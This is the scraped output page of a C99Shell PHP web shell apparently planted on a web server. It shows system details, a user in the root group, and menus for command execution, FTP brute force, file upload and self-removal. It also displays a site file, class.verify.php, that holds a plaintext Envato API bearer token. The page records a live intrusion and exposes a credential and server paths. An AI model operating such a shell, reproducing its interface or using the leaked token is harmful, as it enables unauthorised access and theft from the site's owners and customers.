!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/verify.picotech.app/public_html/   drwxr-x---
Free 28.67 GB of 117.98 GB (24.3%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     class.verify.php (2.04 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
class EnvatoApi2 {
    
// Bearer, no need for OAUTH token, change this to your bearer string
    // https://build.envato.com/api/#token
    //bowy05Om0cE32DKH2tzBQD2rDZGU1fU2
    
private static $bearer "bowy05Om0cE32DKH2tzBQD2rDZGU1fU2"// replace the API key here.
    
    
static function getPurchaseData$code ) {
      
      
//setting the header for the rest of the api
      
$bearer   'bearer ' self::$bearer;
      
$header   = array();
      
$header[] = 'Content-length: 0';
      
$header[] = 'Content-type: application/json; charset=utf-8';
      
$header[] = 'Authorization: ' $bearer;
      
      
$verify_url 'https://api.envato.com/v3/market/author/sale/';
      
$ch_verify curl_init$verify_url '?code=' $code );
      
      
curl_setopt$ch_verifyCURLOPT_HTTPHEADER$header );
      
curl_setopt$ch_verifyCURLOPT_SSL_VERIFYPEERfalse );
      
curl_setopt$ch_verifyCURLOPT_RETURNTRANSFER);
      
curl_setopt$ch_verifyCURLOPT_CONNECTTIMEOUT);
      
curl_setopt$ch_verifyCURLOPT_USERAGENT'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
      
      
$cinit_verify_data curl_exec$ch_verify );
      
curl_close$ch_verify );
      
      if (
$cinit_verify_data != "")    
        return 
json_decode($cinit_verify_data);  
      else
        return 
false;
        
    }
    
    static function 
verifyPurchase$code ) {
      
$verify_obj self::getPurchaseData($code); 
      
      
// Check for correct verify code
      
if ( 
          (
false === $verify_obj) || 
          !
is_object($verify_obj) ||
          isset(
$verify_obj->error) ||
          !isset(
$verify_obj->sold_at)
      )
        return -
1;

      
// If empty or date present, then it's valid
      
if (
        
$verify_obj->supported_until == "" ||
        
$verify_obj->supported_until != null
      
)
        return 
$verify_obj;  
      
      
// Null or something non-string value, thus support period over
      
return 0;
      
    }
  }
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0056 ]--